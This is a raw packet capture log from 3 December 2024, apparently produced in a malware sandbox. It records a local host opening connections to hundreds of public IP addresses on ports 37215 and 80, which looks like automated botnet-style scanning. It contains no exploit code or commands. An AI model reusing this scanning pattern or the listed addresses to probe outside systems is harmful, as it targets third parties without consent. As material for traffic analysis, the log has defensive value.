                                                          Dec 3, 2024 23:16:49.847861052 CET4059737215192.168.2.23197.161.161.60
                                                          Dec 3, 2024 23:16:49.847873926 CET4059737215192.168.2.23197.104.21.223
                                                          Dec 3, 2024 23:16:49.847876072 CET4059737215192.168.2.23197.0.244.128
                                                          Dec 3, 2024 23:16:49.847882986 CET4059737215192.168.2.23156.184.23.167
                                                          Dec 3, 2024 23:16:49.847883940 CET4059737215192.168.2.2341.18.213.74
                                                          Dec 3, 2024 23:16:49.847892046 CET4059737215192.168.2.2341.77.206.62
                                                          Dec 3, 2024 23:16:49.847896099 CET4059737215192.168.2.23197.38.234.106
                                                          Dec 3, 2024 23:16:49.847917080 CET4059737215192.168.2.23156.244.115.60
                                                          Dec 3, 2024 23:16:49.847918034 CET4059737215192.168.2.2341.117.39.242
                                                          Dec 3, 2024 23:16:49.847918034 CET4059737215192.168.2.2341.164.109.10
                                                          Dec 3, 2024 23:16:49.847927094 CET4059737215192.168.2.23197.27.50.152
                                                          Dec 3, 2024 23:16:49.847934008 CET4059737215192.168.2.23197.116.19.137
                                                          Dec 3, 2024 23:16:49.847939014 CET4059737215192.168.2.23156.114.36.207
                                                          Dec 3, 2024 23:16:49.847949028 CET4059737215192.168.2.2341.90.134.2
                                                          Dec 3, 2024 23:16:49.847954988 CET4059737215192.168.2.23197.245.38.65
                                                          Dec 3, 2024 23:16:49.847966909 CET4059737215192.168.2.23197.186.144.205
                                                          Dec 3, 2024 23:16:49.847971916 CET4059737215192.168.2.2341.166.245.156
                                                          Dec 3, 2024 23:16:49.847974062 CET4059737215192.168.2.2341.213.81.60
                                                          Dec 3, 2024 23:16:49.847989082 CET4059737215192.168.2.2341.30.23.62
                                                          Dec 3, 2024 23:16:49.847990990 CET4059737215192.168.2.2341.135.94.253
                                                          Dec 3, 2024 23:16:49.847992897 CET4059737215192.168.2.23197.33.137.37
                                                          Dec 3, 2024 23:16:49.847992897 CET4059737215192.168.2.23156.166.95.216
                                                          Dec 3, 2024 23:16:49.847995996 CET4059737215192.168.2.23197.135.13.191
                                                          Dec 3, 2024 23:16:49.848000050 CET4059737215192.168.2.23156.136.127.26
                                                          Dec 3, 2024 23:16:49.848001003 CET4059737215192.168.2.23197.251.32.221
                                                          Dec 3, 2024 23:16:49.848021030 CET4059737215192.168.2.23197.203.38.132
                                                          Dec 3, 2024 23:16:49.848021030 CET4059737215192.168.2.23156.99.187.244
                                                          Dec 3, 2024 23:16:49.848026991 CET4059737215192.168.2.23156.42.214.103
                                                          Dec 3, 2024 23:16:49.848038912 CET4059737215192.168.2.2341.129.25.254
                                                          Dec 3, 2024 23:16:49.848042011 CET4059737215192.168.2.23156.237.150.88
                                                          Dec 3, 2024 23:16:49.848045111 CET4059737215192.168.2.23156.241.224.111
                                                          Dec 3, 2024 23:16:49.848045111 CET4059737215192.168.2.2341.199.30.63
                                                          Dec 3, 2024 23:16:49.848054886 CET4059737215192.168.2.23197.30.226.72
                                                          Dec 3, 2024 23:16:49.848061085 CET4059737215192.168.2.23197.73.126.118
                                                          Dec 3, 2024 23:16:49.848067045 CET4059737215192.168.2.23197.163.57.232
                                                          Dec 3, 2024 23:16:49.848071098 CET4059737215192.168.2.23197.34.222.248
                                                          Dec 3, 2024 23:16:49.848083973 CET4059737215192.168.2.23197.63.68.105
                                                          Dec 3, 2024 23:16:49.848087072 CET4059737215192.168.2.2341.176.113.102
                                                          Dec 3, 2024 23:16:49.848094940 CET4059737215192.168.2.23197.25.109.73
                                                          Dec 3, 2024 23:16:49.848104954 CET4059737215192.168.2.23197.175.210.90
                                                          Dec 3, 2024 23:16:49.848105907 CET4059737215192.168.2.2341.171.146.164
                                                          Dec 3, 2024 23:16:49.848123074 CET4059737215192.168.2.23156.147.168.149
                                                          Dec 3, 2024 23:16:49.848124981 CET4059737215192.168.2.23156.10.77.155
                                                          Dec 3, 2024 23:16:49.848129034 CET4059737215192.168.2.23156.201.12.92
                                                          Dec 3, 2024 23:16:49.848130941 CET4059737215192.168.2.23156.215.54.242
                                                          Dec 3, 2024 23:16:49.848133087 CET4059737215192.168.2.23197.35.245.17
                                                          Dec 3, 2024 23:16:49.848135948 CET4059737215192.168.2.2341.102.124.135
                                                          Dec 3, 2024 23:16:49.848140955 CET4059737215192.168.2.23197.154.88.94
                                                          Dec 3, 2024 23:16:49.848143101 CET4059737215192.168.2.23156.24.137.74
                                                          Dec 3, 2024 23:16:49.848151922 CET4059737215192.168.2.2341.93.152.75
                                                          Dec 3, 2024 23:16:49.848160982 CET4059737215192.168.2.2341.198.214.181
                                                          Dec 3, 2024 23:16:49.848166943 CET4059737215192.168.2.23156.164.71.158
                                                          Dec 3, 2024 23:16:49.848167896 CET4059737215192.168.2.23197.250.252.201
                                                          Dec 3, 2024 23:16:49.848167896 CET4059737215192.168.2.23197.52.162.2
                                                          Dec 3, 2024 23:16:49.848167896 CET4059737215192.168.2.23156.236.156.128
                                                          Dec 3, 2024 23:16:49.848172903 CET4059737215192.168.2.2341.109.187.68
                                                          Dec 3, 2024 23:16:49.848177910 CET4059737215192.168.2.23156.209.249.11
                                                          Dec 3, 2024 23:16:49.848177910 CET4059737215192.168.2.2341.215.23.5
                                                          Dec 3, 2024 23:16:49.848176956 CET4059737215192.168.2.23197.26.122.42
                                                          Dec 3, 2024 23:16:49.848176956 CET4059737215192.168.2.2341.157.93.221
                                                          Dec 3, 2024 23:16:49.848186016 CET4059737215192.168.2.2341.86.223.105
                                                          Dec 3, 2024 23:16:49.848202944 CET4059737215192.168.2.23156.183.77.17
                                                          Dec 3, 2024 23:16:49.848206997 CET4059737215192.168.2.23156.142.133.35
                                                          Dec 3, 2024 23:16:49.848210096 CET4059737215192.168.2.2341.15.81.95
                                                          Dec 3, 2024 23:16:49.848213911 CET4059737215192.168.2.23156.124.37.48
                                                          Dec 3, 2024 23:16:49.848226070 CET4059737215192.168.2.23197.169.55.65
                                                          Dec 3, 2024 23:16:49.848231077 CET4059737215192.168.2.23197.118.157.156
                                                          Dec 3, 2024 23:16:49.848231077 CET4059737215192.168.2.23156.152.188.107
                                                          Dec 3, 2024 23:16:49.848231077 CET4059737215192.168.2.23156.121.239.30
                                                          Dec 3, 2024 23:16:49.848248005 CET4059737215192.168.2.23156.172.247.168
                                                          Dec 3, 2024 23:16:49.848251104 CET4059737215192.168.2.23156.65.33.91
                                                          Dec 3, 2024 23:16:49.848258972 CET4059737215192.168.2.23156.106.250.63
                                                          Dec 3, 2024 23:16:49.848267078 CET4059737215192.168.2.23156.1.2.89
                                                          Dec 3, 2024 23:16:49.848273039 CET4059737215192.168.2.23156.76.115.94
                                                          Dec 3, 2024 23:16:49.848282099 CET4059737215192.168.2.23197.80.211.224
                                                          Dec 3, 2024 23:16:49.848289967 CET4059737215192.168.2.23156.51.62.27
                                                          Dec 3, 2024 23:16:49.848289967 CET4059737215192.168.2.23156.23.157.95
                                                          Dec 3, 2024 23:16:49.848304033 CET4059737215192.168.2.23197.29.145.7
                                                          Dec 3, 2024 23:16:49.848304033 CET4059737215192.168.2.23156.45.181.52
                                                          Dec 3, 2024 23:16:49.848305941 CET4059737215192.168.2.2341.237.179.186
                                                          Dec 3, 2024 23:16:49.848309040 CET4059737215192.168.2.23156.247.84.170
                                                          Dec 3, 2024 23:16:49.848321915 CET4059737215192.168.2.23197.139.194.25
                                                          Dec 3, 2024 23:16:49.848328114 CET4059737215192.168.2.2341.69.33.43
                                                          Dec 3, 2024 23:16:49.848330021 CET4059737215192.168.2.2341.36.211.230
                                                          Dec 3, 2024 23:16:49.848334074 CET4059737215192.168.2.2341.126.142.238
                                                          Dec 3, 2024 23:16:49.848346949 CET4059737215192.168.2.23156.172.203.116
                                                          Dec 3, 2024 23:16:49.848351002 CET4059737215192.168.2.23197.199.45.59
                                                          Dec 3, 2024 23:16:49.848356962 CET4059737215192.168.2.23197.154.138.228
                                                          Dec 3, 2024 23:16:49.848359108 CET4059737215192.168.2.23156.245.32.37
                                                          Dec 3, 2024 23:16:49.848371983 CET4059737215192.168.2.2341.213.121.252
                                                          Dec 3, 2024 23:16:49.848377943 CET4059737215192.168.2.23156.156.80.88
                                                          Dec 3, 2024 23:16:49.848381996 CET4059737215192.168.2.2341.230.7.23
                                                          Dec 3, 2024 23:16:49.848382950 CET4059737215192.168.2.23156.10.66.189
                                                          Dec 3, 2024 23:16:49.848382950 CET4059737215192.168.2.23197.168.8.157
                                                          Dec 3, 2024 23:16:49.848397017 CET4059737215192.168.2.23156.10.121.16
                                                          Dec 3, 2024 23:16:49.848397017 CET4059737215192.168.2.2341.34.34.68
                                                          Dec 3, 2024 23:16:49.848407984 CET4059737215192.168.2.23197.44.201.214
                                                          Dec 3, 2024 23:16:49.848408937 CET4059737215192.168.2.2341.100.143.246
                                                          Dec 3, 2024 23:16:49.848740101 CET3475637215192.168.2.2341.5.104.100
                                                          Dec 3, 2024 23:16:49.849349022 CET5582437215192.168.2.23156.251.110.116
                                                          Dec 3, 2024 23:16:49.849947929 CET5158437215192.168.2.23156.87.239.158
                                                          Dec 3, 2024 23:16:49.850564957 CET4036637215192.168.2.2341.131.210.92
                                                          Dec 3, 2024 23:16:49.851178885 CET6013637215192.168.2.2341.47.204.108
                                                          Dec 3, 2024 23:16:49.851775885 CET3541237215192.168.2.23197.99.145.0
                                                          Dec 3, 2024 23:16:49.852365971 CET5637837215192.168.2.2341.49.33.245
                                                          Dec 3, 2024 23:16:49.852983952 CET3322037215192.168.2.23156.151.72.168
                                                          Dec 3, 2024 23:16:49.853600025 CET3460637215192.168.2.23197.117.181.6
                                                          Dec 3, 2024 23:16:49.855205059 CET3721545386197.101.175.187192.168.2.23
                                                          Dec 3, 2024 23:16:49.855247974 CET4538637215192.168.2.23197.101.175.187
                                                          Dec 3, 2024 23:16:49.867530107 CET4463237215192.168.2.23156.133.165.115
                                                          Dec 3, 2024 23:16:49.868150949 CET5321237215192.168.2.2341.126.145.123
                                                          Dec 3, 2024 23:16:49.868769884 CET3814637215192.168.2.23156.248.1.33
                                                          Dec 3, 2024 23:16:49.869353056 CET4951437215192.168.2.2341.145.144.127
                                                          Dec 3, 2024 23:16:49.869828939 CET4348037215192.168.2.23156.113.104.220
                                                          Dec 3, 2024 23:16:49.869828939 CET4348037215192.168.2.23156.113.104.220
                                                          Dec 3, 2024 23:16:49.870098114 CET4357037215192.168.2.23156.113.104.220
                                                          Dec 3, 2024 23:16:49.870455980 CET4538637215192.168.2.23197.101.175.187
                                                          Dec 3, 2024 23:16:49.870455980 CET4538637215192.168.2.23197.101.175.187
                                                          Dec 3, 2024 23:16:49.870726109 CET4545237215192.168.2.23197.101.175.187
                                                          Dec 3, 2024 23:16:49.927208900 CET4121680192.168.2.23160.108.6.246
                                                          Dec 3, 2024 23:16:49.927208900 CET6031280192.168.2.23108.165.135.39
                                                          Dec 3, 2024 23:16:49.927210093 CET4152680192.168.2.2313.3.191.55
                                                          Dec 3, 2024 23:16:49.927211046 CET5836480192.168.2.23105.92.24.72
                                                          Dec 3, 2024 23:16:49.927212954 CET6020880192.168.2.23194.223.37.30
                                                          Dec 3, 2024 23:16:49.927215099 CET4103080192.168.2.2353.125.178.189
                                                          Dec 3, 2024 23:16:49.927225113 CET5910880192.168.2.23110.77.100.173
                                                          Dec 3, 2024 23:16:49.927236080 CET5643280192.168.2.2349.188.188.233
                                                          Dec 3, 2024 23:16:49.927237034 CET5832080192.168.2.2337.79.12.216
                                                          Dec 3, 2024 23:16:49.927237034 CET4396280192.168.2.23107.26.129.146
                                                          Dec 3, 2024 23:16:49.927237988 CET5591680192.168.2.2397.41.29.227
                                                          Dec 3, 2024 23:16:49.971781015 CET372154059741.171.44.196192.168.2.23
                                                          Dec 3, 2024 23:16:49.971836090 CET3721540597197.173.204.9192.168.2.23
                                                          Dec 3, 2024 23:16:49.971851110 CET4059737215192.168.2.2341.171.44.196
                                                          Dec 3, 2024 23:16:49.971927881 CET4059737215192.168.2.23197.173.204.9
                                                          Dec 3, 2024 23:16:49.971940994 CET372154059741.238.72.229192.168.2.23
                                                          Dec 3, 2024 23:16:49.971957922 CET3721540597156.202.143.176192.168.2.23
                                                          Dec 3, 2024 23:16:49.971967936 CET3721540597197.79.45.182192.168.2.23
                                                          Dec 3, 2024 23:16:49.971976042 CET3721540597197.168.254.205192.168.2.23
                                                          Dec 3, 2024 23:16:49.971982956 CET3721540597197.171.142.249192.168.2.23
                                                          Dec 3, 2024 23:16:49.971987009 CET4059737215192.168.2.2341.238.72.229
                                                          Dec 3, 2024 23:16:49.971997023 CET3721540597156.124.6.104192.168.2.23
                                                          Dec 3, 2024 23:16:49.971997976 CET4059737215192.168.2.23197.79.45.182
                                                          Dec 3, 2024 23:16:49.972003937 CET4059737215192.168.2.23197.168.254.205
                                                          Dec 3, 2024 23:16:49.972007990 CET3721540597156.104.224.250192.168.2.23
                                                          Dec 3, 2024 23:16:49.972017050 CET372154059741.50.237.224192.168.2.23
                                                          Dec 3, 2024 23:16:49.972021103 CET4059737215192.168.2.23156.202.143.176
                                                          Dec 3, 2024 23:16:49.972043991 CET4059737215192.168.2.23197.171.142.249
                                                          Dec 3, 2024 23:16:49.972064018 CET4059737215192.168.2.23156.124.6.104
                                                          Dec 3, 2024 23:16:49.972068071 CET3721540597156.7.205.183192.168.2.23
                                                          Dec 3, 2024 23:16:49.972079039 CET4059737215192.168.2.23156.104.224.250
                                                          Dec 3, 2024 23:16:49.972095966 CET4059737215192.168.2.2341.50.237.224
                                                          Dec 3, 2024 23:16:49.972095966 CET4059737215192.168.2.23156.7.205.183
                                                          Dec 3, 2024 23:16:49.975486994 CET3721535412197.99.145.0192.168.2.23
                                                          Dec 3, 2024 23:16:49.975529909 CET3541237215192.168.2.23197.99.145.0
                                                          Dec 3, 2024 23:16:49.975857973 CET3517637215192.168.2.2341.171.44.196
                                                          Dec 3, 2024 23:16:49.976453066 CET4924837215192.168.2.23197.173.204.9
                                                          Dec 3, 2024 23:16:49.977044106 CET5261437215192.168.2.2341.238.72.229
                                                          Dec 3, 2024 23:16:49.977627039 CET5574837215192.168.2.23197.79.45.182
                                                          Dec 3, 2024 23:16:49.978226900 CET5221437215192.168.2.23197.168.254.205
                                                          Dec 3, 2024 23:16:49.978823900 CET3980237215192.168.2.23156.202.143.176
                                                          Dec 3, 2024 23:16:49.979743004 CET4233237215192.168.2.23197.171.142.249
                                                          Dec 3, 2024 23:16:49.980343103 CET3865037215192.168.2.23156.124.6.104
                                                          Dec 3, 2024 23:16:49.980935097 CET3316437215192.168.2.23156.104.224.250
                                                          Dec 3, 2024 23:16:49.981543064 CET5490837215192.168.2.2341.50.237.224
                                                          Dec 3, 2024 23:16:49.982170105 CET4380237215192.168.2.23156.7.205.183
                                                          Dec 3, 2024 23:16:49.982573986 CET3541237215192.168.2.23197.99.145.0
                                                          Dec 3, 2024 23:16:49.982573986 CET3541237215192.168.2.23197.99.145.0
                                                          Dec 3, 2024 23:16:49.982832909 CET3545437215192.168.2.23197.99.145.0
                                                          Dec 3, 2024 23:16:49.991386890 CET3721544632156.133.165.115192.168.2.23
                                                          Dec 3, 2024 23:16:49.991439104 CET4463237215192.168.2.23156.133.165.115
                                                          Dec 3, 2024 23:16:49.991482973 CET4463237215192.168.2.23156.133.165.115
                                                          Dec 3, 2024 23:16:49.991482973 CET4463237215192.168.2.23156.133.165.115
                                                          Dec 3, 2024 23:16:49.991741896 CET4466837215192.168.2.23156.133.165.115
                                                          Dec 3, 2024 23:16:49.993542910 CET3721543480156.113.104.220192.168.2.23
                                                          Dec 3, 2024 23:16:49.994147062 CET3721545386197.101.175.187192.168.2.23
                                                          Dec 3, 2024 23:16:50.037431955 CET3721545386197.101.175.187192.168.2.23
                                                          Dec 3, 2024 23:16:50.037441015 CET3721543480156.113.104.220192.168.2.23
                                                          Dec 3, 2024 23:16:50.051394939 CET804152613.3.191.55192.168.2.23
                                                          Dec 3, 2024 23:16:50.051453114 CET4152680192.168.2.2313.3.191.55
                                                          Dec 3, 2024 23:16:50.051516056 CET4059680192.168.2.23168.200.219.64
                                                          Dec 3, 2024 23:16:50.051516056 CET4059680192.168.2.23209.58.154.1
                                                          Dec 3, 2024 23:16:50.051521063 CET4059680192.168.2.23166.27.48.146
                                                          Dec 3, 2024 23:16:50.051527023 CET4059680192.168.2.23107.228.249.17
                                                          Dec 3, 2024 23:16:50.051536083 CET4059680192.168.2.2374.248.70.53
                                                          Dec 3, 2024 23:16:50.051537037 CET4059680192.168.2.2387.101.119.206
                                                          Dec 3, 2024 23:16:50.051538944 CET8041216160.108.6.246192.168.2.23
                                                          Dec 3, 2024 23:16:50.051548958 CET8058364105.92.24.72192.168.2.23
                                                          Dec 3, 2024 23:16:50.051554918 CET4059680192.168.2.2381.193.189.217
                                                          Dec 3, 2024 23:16:50.051556110 CET4059680192.168.2.23153.132.153.36
                                                          Dec 3, 2024 23:16:50.051558018 CET4059680192.168.2.2318.81.40.21
                                                          Dec 3, 2024 23:16:50.051563978 CET8060312108.165.135.39192.168.2.23
                                                          Dec 3, 2024 23:16:50.051578045 CET8060208194.223.37.30192.168.2.23
                                                          Dec 3, 2024 23:16:50.051578045 CET4059680192.168.2.23103.173.220.38
                                                          Dec 3, 2024 23:16:50.051578999 CET5836480192.168.2.23105.92.24.72
                                                          Dec 3, 2024 23:16:50.051584959 CET4121680192.168.2.23160.108.6.246
                                                          Dec 3, 2024 23:16:50.051588058 CET804103053.125.178.189192.168.2.23
                                                          Dec 3, 2024 23:16:50.051595926 CET6031280192.168.2.23108.165.135.39
                                                          Dec 3, 2024 23:16:50.051601887 CET6020880192.168.2.23194.223.37.30
                                                          Dec 3, 2024 23:16:50.051615000 CET4059680192.168.2.2374.97.190.22
                                                          Dec 3, 2024 23:16:50.051615953 CET4059680192.168.2.232.172.236.81
                                                          Dec 3, 2024 23:16:50.051625967 CET4059680192.168.2.2397.172.184.189
                                                          Dec 3, 2024 23:16:50.051625967 CET4103080192.168.2.2353.125.178.189
                                                          Dec 3, 2024 23:16:50.051629066 CET4059680192.168.2.2361.111.43.223
                                                          Dec 3, 2024 23:16:50.051644087 CET4059680192.168.2.23161.99.179.32
                                                          Dec 3, 2024 23:16:50.051645994 CET4059680192.168.2.23216.241.96.182
                                                          Dec 3, 2024 23:16:50.051649094 CET4059680192.168.2.23103.100.67.67
                                                          Dec 3, 2024 23:16:50.051649094 CET4059680192.168.2.23197.99.117.60
                                                          Dec 3, 2024 23:16:50.051652908 CET4059680192.168.2.2350.95.61.18
                                                          Dec 3, 2024 23:16:50.051657915 CET4059680192.168.2.23205.245.111.148
                                                          Dec 3, 2024 23:16:50.051665068 CET4059680192.168.2.23213.91.125.70
                                                          Dec 3, 2024 23:16:50.051676989 CET4059680192.168.2.2337.5.179.84
                                                          Dec 3, 2024 23:16:50.051676989 CET4059680192.168.2.2327.253.236.34
                                                          Dec 3, 2024 23:16:50.051676989 CET4059680192.168.2.23192.156.79.194
                                                          Dec 3, 2024 23:16:50.051677942 CET4059680192.168.2.23136.5.253.247
                                                          Dec 3, 2024 23:16:50.051691055 CET4059680192.168.2.23213.69.201.104
                                                          Dec 3, 2024 23:16:50.051697016 CET4059680192.168.2.23119.224.112.176
                                                          Dec 3, 2024 23:16:50.051702976 CET4059680192.168.2.23158.4.4.219
                                                          Dec 3, 2024 23:16:50.051713943 CET4059680192.168.2.23164.5.176.220
                                                          Dec 3, 2024 23:16:50.051714897 CET4059680192.168.2.23134.99.215.214
                                                          Dec 3, 2024 23:16:50.051721096 CET4059680192.168.2.2345.34.55.192
                                                          Dec 3, 2024 23:16:50.051728964 CET4059680192.168.2.23117.247.71.229
                                                          Dec 3, 2024 23:16:50.051734924 CET4059680192.168.2.2381.1.62.237
                                                          Dec 3, 2024 23:16:50.051738024 CET4059680192.168.2.2343.56.143.180
                                                          Dec 3, 2024 23:16:50.051743984 CET4059680192.168.2.23146.159.170.128
                                                          Dec 3, 2024 23:16:50.051752090 CET4059680192.168.2.23169.155.165.208
                                                          Dec 3, 2024 23:16:50.051758051 CET4059680192.168.2.238.253.42.76
                                                          Dec 3, 2024 23:16:50.051759958 CET4059680192.168.2.23108.118.129.181
                                                          Dec 3, 2024 23:16:50.051763058 CET4059680192.168.2.23208.60.222.18
                                                          Dec 3, 2024 23:16:50.051765919 CET4059680192.168.2.23202.35.161.201
                                                          Dec 3, 2024 23:16:50.051774979 CET4059680192.168.2.2365.94.183.68
                                                          Dec 3, 2024 23:16:50.051779985 CET4059680192.168.2.23155.144.107.90
                                                          Dec 3, 2024 23:16:50.051779985 CET4059680192.168.2.2343.10.175.154
                                                          Dec 3, 2024 23:16:50.051789999 CET4059680192.168.2.23100.187.240.188
                                                          Dec 3, 2024 23:16:50.051801920 CET4059680192.168.2.2319.170.203.23
                                                          Dec 3, 2024 23:16:50.051801920 CET4059680192.168.2.23180.106.195.135
                                                          Dec 3, 2024 23:16:50.051817894 CET4059680192.168.2.23118.67.78.128
                                                          Dec 3, 2024 23:16:50.051820040 CET4059680192.168.2.23205.225.201.44
                                                          Dec 3, 2024 23:16:50.051821947 CET4059680192.168.2.2357.149.92.235
                                                          Dec 3, 2024 23:16:50.051826000 CET4059680192.168.2.23131.163.203.37
                                                          Dec 3, 2024 23:16:50.051840067 CET4059680192.168.2.23113.64.237.233
                                                          Dec 3, 2024 23:16:50.051840067 CET4059680192.168.2.2391.68.142.234
                                                          Dec 3, 2024 23:16:50.051840067 CET4059680192.168.2.2384.60.199.114
                                                          Dec 3, 2024 23:16:50.051851034 CET4059680192.168.2.2362.138.165.75
                                                          Dec 3, 2024 23:16:50.051851034 CET4059680192.168.2.2334.130.176.49
                                                          Dec 3, 2024 23:16:50.051857948 CET4059680192.168.2.2390.171.141.247
                                                          Dec 3, 2024 23:16:50.051877975 CET4059680192.168.2.2386.180.2.38
                                                          Dec 3, 2024 23:16:50.051872969 CET4059680192.168.2.23153.78.105.201
                                                          Dec 3, 2024 23:16:50.051878929 CET4059680192.168.2.2366.151.227.50
                                                          Dec 3, 2024 23:16:50.051886082 CET4059680192.168.2.2391.50.113.209
                                                          Dec 3, 2024 23:16:50.051886082 CET4059680192.168.2.23152.54.229.166
                                                          Dec 3, 2024 23:16:50.051898956 CET4059680192.168.2.2394.184.11.54
                                                          Dec 3, 2024 23:16:50.051901102 CET4059680192.168.2.23222.206.129.152
                                                          Dec 3, 2024 23:16:50.051911116 CET4059680192.168.2.239.194.112.244
                                                          Dec 3, 2024 23:16:50.051918983 CET4059680192.168.2.2370.6.66.206
                                                          Dec 3, 2024 23:16:50.051923037 CET4059680192.168.2.23174.55.165.111
                                                          Dec 3, 2024 23:16:50.051939011 CET4059680192.168.2.23222.251.91.91
                                                          Dec 3, 2024 23:16:50.051940918 CET4059680192.168.2.2340.206.81.18
                                                          Dec 3, 2024 23:16:50.051944971 CET4059680192.168.2.23192.35.188.166
                                                          Dec 3, 2024 23:16:50.051958084 CET4059680192.168.2.23151.73.232.40
                                                          Dec 3, 2024 23:16:50.051965952 CET4059680192.168.2.2314.3.120.149
                                                          Dec 3, 2024 23:16:50.051965952 CET4059680192.168.2.23139.30.193.124
                                                          Dec 3, 2024 23:16:50.051968098 CET4059680192.168.2.23123.255.248.48
                                                          Dec 3, 2024 23:16:50.051969051 CET4059680192.168.2.2354.238.147.40
                                                          Dec 3, 2024 23:16:50.051970959 CET4059680192.168.2.23169.113.214.205
                                                          Dec 3, 2024 23:16:50.051990032 CET4059680192.168.2.2390.80.50.178
                                                          Dec 3, 2024 23:16:50.052001953 CET4059680192.168.2.23143.227.228.168
                                                          Dec 3, 2024 23:16:50.052002907 CET4059680192.168.2.23173.114.33.254
                                                          Dec 3, 2024 23:16:50.052009106 CET4059680192.168.2.23133.182.147.171
                                                          Dec 3, 2024 23:16:50.052017927 CET4059680192.168.2.2371.63.250.10
                                                          Dec 3, 2024 23:16:50.052018881 CET4059680192.168.2.23165.83.133.62
                                                          Dec 3, 2024 23:16:50.052026033 CET4059680192.168.2.2341.45.182.198
                                                          Dec 3, 2024 23:16:50.052031994 CET4059680192.168.2.2360.25.220.125
                                                          Dec 3, 2024 23:16:50.052033901 CET4059680192.168.2.23156.81.167.148
                                                          Dec 3, 2024 23:16:50.052037001 CET4059680192.168.2.23206.171.22.89
                                                          Dec 3, 2024 23:16:50.052053928 CET4059680192.168.2.23164.24.235.149
                                                          Dec 3, 2024 23:16:50.052054882 CET4059680192.168.2.23119.200.146.71
                                                          Dec 3, 2024 23:16:50.052057028 CET4059680192.168.2.23143.79.82.146
                                                          Dec 3, 2024 23:16:50.052062988 CET4059680192.168.2.2320.161.13.191
                                                          Dec 3, 2024 23:16:50.052063942 CET4059680192.168.2.2363.19.106.13
                                                          Dec 3, 2024 23:16:50.052073002 CET4059680192.168.2.2317.193.238.182
                                                          Dec 3, 2024 23:16:50.052079916 CET4059680192.168.2.23135.59.92.98
                                                          Dec 3, 2024 23:16:50.052092075 CET4059680192.168.2.2373.185.47.141
                                                          Dec 3, 2024 23:16:50.052093983 CET4059680192.168.2.23170.185.84.18
                                                          Dec 3, 2024 23:16:50.052094936 CET4059680192.168.2.2369.38.44.119
                                                          Dec 3, 2024 23:16:50.052112103 CET4059680192.168.2.23210.36.0.47
                                                          Dec 3, 2024 23:16:50.052115917 CET4059680192.168.2.23181.34.168.235
                                                          Dec 3, 2024 23:16:50.052119017 CET4059680192.168.2.23197.2.88.212
                                                          Dec 3, 2024 23:16:50.052120924 CET4059680192.168.2.23103.36.78.232
                                                          Dec 3, 2024 23:16:50.052139044 CET4059680192.168.2.23136.86.207.164
                                                          Dec 3, 2024 23:16:50.052140951 CET4059680192.168.2.23219.23.241.199
                                                          Dec 3, 2024 23:16:50.052140951 CET4059680192.168.2.23137.125.156.99
                                                          Dec 3, 2024 23:16:50.052140951 CET4059680192.168.2.23177.113.60.40
                                                          Dec 3, 2024 23:16:50.052144051 CET4059680192.168.2.23190.199.247.69
                                                          Dec 3, 2024 23:16:50.052145004 CET4059680192.168.2.2362.228.61.176
                                                          Dec 3, 2024 23:16:50.052171946 CET4059680192.168.2.2366.35.199.87
                                                          Dec 3, 2024 23:16:50.052171946 CET4059680192.168.2.23186.94.39.178
                                                          Dec 3, 2024 23:16:50.052172899 CET4059680192.168.2.23178.42.154.194
                                                          Dec 3, 2024 23:16:50.052175999 CET4059680192.168.2.2346.173.3.148
                                                          Dec 3, 2024 23:16:50.052175999 CET4059680192.168.2.2332.38.137.44
                                                          Dec 3, 2024 23:16:50.052181959 CET4059680192.168.2.23136.13.177.225
                                                          Dec 3, 2024 23:16:50.052181959 CET4059680192.168.2.23136.38.107.77
                                                          Dec 3, 2024 23:16:50.052184105 CET4059680192.168.2.2397.99.203.184
                                                          Dec 3, 2024 23:16:50.052184105 CET4059680192.168.2.23102.203.92.20
                                                          Dec 3, 2024 23:16:50.052186966 CET4059680192.168.2.2318.169.128.217
                                                          Dec 3, 2024 23:16:50.052189112 CET4059680192.168.2.23123.187.183.192
                                                          Dec 3, 2024 23:16:50.052190065 CET4059680192.168.2.2397.125.45.89
                                                          Dec 3, 2024 23:16:50.052192926 CET4059680192.168.2.2369.21.197.32
                                                          Dec 3, 2024 23:16:50.052196026 CET4059680192.168.2.23172.41.8.158
                                                          Dec 3, 2024 23:16:50.052211046 CET4059680192.168.2.2346.101.225.9
                                                          Dec 3, 2024 23:16:50.052213907 CET4059680192.168.2.23154.233.193.84
                                                          Dec 3, 2024 23:16:50.052218914 CET4059680192.168.2.23193.8.6.102
                                                          Dec 3, 2024 23:16:50.052229881 CET4059680192.168.2.23183.25.127.105
                                                          Dec 3, 2024 23:16:50.052236080 CET4059680192.168.2.23168.130.92.55
                                                          Dec 3, 2024 23:16:50.052237988 CET4059680192.168.2.23148.159.108.61
                                                          Dec 3, 2024 23:16:50.052237988 CET4059680192.168.2.23145.211.195.211
                                                          Dec 3, 2024 23:16:50.052242041 CET4059680192.168.2.2353.56.44.190
                                                          Dec 3, 2024 23:16:50.052242041 CET4059680192.168.2.23204.144.226.170
                                                          Dec 3, 2024 23:16:50.052242041 CET4059680192.168.2.23198.165.120.247
                                                          Dec 3, 2024 23:16:50.052253962 CET4059680192.168.2.23108.70.124.188
                                                          Dec 3, 2024 23:16:50.052265882 CET4059680192.168.2.2386.211.214.156
                                                          Dec 3, 2024 23:16:50.052270889 CET4059680192.168.2.23197.48.131.87
                                                          Dec 3, 2024 23:16:50.052277088 CET4059680192.168.2.23114.134.73.19
                                                          Dec 3, 2024 23:16:50.052278996 CET4059680192.168.2.2380.81.210.247
                                                          Dec 3, 2024 23:16:50.052282095 CET4059680192.168.2.2395.203.177.177
                                                          Dec 3, 2024 23:16:50.052283049 CET4059680192.168.2.2350.206.116.167
                                                          Dec 3, 2024 23:16:50.052283049 CET4059680192.168.2.23101.117.96.56
                                                          Dec 3, 2024 23:16:50.052284956 CET4059680192.168.2.23182.209.90.76
                                                          Dec 3, 2024 23:16:50.052288055 CET4059680192.168.2.23119.244.83.80
                                                          Dec 3, 2024 23:16:50.052301884 CET4059680192.168.2.23162.23.239.185
                                                          Dec 3, 2024 23:16:50.052304029 CET4059680192.168.2.2395.49.77.53
                                                          Dec 3, 2024 23:16:50.052309990 CET4059680192.168.2.23118.204.81.148
                                                          Dec 3, 2024 23:16:50.052320957 CET4059680192.168.2.23160.117.12.59
                                                          Dec 3, 2024 23:16:50.052328110 CET4059680192.168.2.2341.161.60.96
                                                          Dec 3, 2024 23:16:50.052330971 CET4059680192.168.2.231.40.74.188
                                                          Dec 3, 2024 23:16:50.052334070 CET4059680192.168.2.23186.118.63.42
                                                          Dec 3, 2024 23:16:50.052350998 CET4059680192.168.2.23183.39.83.41
                                                          Dec 3, 2024 23:16:50.052351952 CET4059680192.168.2.232.71.216.8
